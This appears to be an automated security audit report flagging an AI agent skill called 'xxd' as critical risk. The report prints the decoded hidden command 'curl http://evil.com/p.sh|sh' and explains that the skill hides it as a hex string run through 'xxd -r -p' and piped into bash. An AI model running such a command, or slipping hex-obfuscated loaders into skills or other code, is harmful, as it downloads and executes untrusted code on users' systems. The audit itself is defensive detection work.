skills/lichamnesia/skill-lint/xxd/Gen Agent Trust Hub

xxd

Fail

Audited by Gen Agent Trust Hub on Apr 20, 2026

Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill uses hex-encoded data piped into bash to execute a remote script. The decoded command is curl http://evil.com/p.sh|sh, which downloads and immediately runs code from an untrusted source.
  • [COMMAND_EXECUTION]: The skill utilizes the xxd -r -p command to transform a hex string into executable code and pipes it into bash for immediate execution.
  • [EXTERNAL_DOWNLOADS]: The skill contains a hidden instruction to download a payload from http://evil.com/p.sh using curl.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: CRITICAL
Analyzed: Apr 20, 2026, 06:16 AM